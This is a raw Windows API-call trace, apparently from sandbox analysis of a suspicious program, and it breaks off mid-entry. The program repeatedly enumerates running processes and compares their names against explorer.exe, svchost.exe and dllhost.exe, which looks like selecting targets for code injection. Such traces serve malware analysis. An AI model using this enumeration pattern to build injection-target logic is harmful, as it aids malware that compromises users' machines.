[0239.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0239.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0239.884] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.884] CloseHandle (hObject=0xd8) returned 1 [0239.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0239.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0239.885] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.885] CloseHandle (hObject=0xd8) returned 1 [0239.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0239.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0239.885] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.885] CloseHandle (hObject=0xd8) returned 1 [0239.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0239.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0239.886] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.886] CloseHandle (hObject=0xd8) returned 1 [0239.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0239.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0239.886] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.887] CloseHandle (hObject=0xd8) returned 1 [0239.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0239.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0239.887] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.887] CloseHandle (hObject=0xd8) returned 1 [0239.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0239.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0239.888] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.888] CloseHandle (hObject=0xd8) returned 1 [0239.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0239.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0239.888] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.888] CloseHandle (hObject=0xd8) returned 1 [0239.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0239.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0239.889] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.889] CloseHandle (hObject=0xd8) returned 1 [0239.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0239.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0239.889] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.889] CloseHandle (hObject=0xd8) returned 1 [0239.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0239.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0239.890] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.890] CloseHandle (hObject=0xd8) returned 1 [0239.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0239.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0239.891] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.891] CloseHandle (hObject=0xd8) returned 1 [0239.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0239.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0239.892] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.892] CloseHandle (hObject=0xd8) returned 1 [0239.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0239.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0239.892] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.892] CloseHandle (hObject=0xd8) returned 1 [0239.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0239.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0239.893] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.893] CloseHandle (hObject=0xd8) returned 1 [0239.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0239.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0239.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0239.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0239.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0239.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0239.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.896] CloseHandle (hObject=0xd8) returned 1 [0239.896] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0239.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0239.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.897] CloseHandle (hObject=0xd8) returned 1 [0239.897] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0239.897] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0239.897] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0239.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0239.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0239.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.898] CloseHandle (hObject=0xd8) returned 1 [0239.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0239.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.898] CloseHandle (hObject=0xd8) returned 1 [0239.898] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0239.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0239.899] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.899] CloseHandle (hObject=0xd8) returned 1 [0239.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0239.900] CloseHandle (hObject=0xd4) returned 1 [0239.900] Sleep (dwMilliseconds=0x3e8) [0240.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0240.929] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0240.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0240.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0240.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0240.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0240.932] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0240.932] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0240.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0240.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0240.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0240.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0240.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0240.935] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0240.936] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0240.936] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0240.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0240.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0240.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0240.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0240.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0240.939] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.939] CloseHandle (hObject=0xd8) returned 1 [0240.939] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0240.939] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0240.939] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0240.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0240.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0240.941] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.941] CloseHandle (hObject=0xd8) returned 1 [0240.941] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0240.941] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0240.941] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0240.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0240.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0240.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0240.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0240.943] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.943] CloseHandle (hObject=0xd8) returned 1 [0240.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0240.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0240.943] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0240.944] CloseHandle 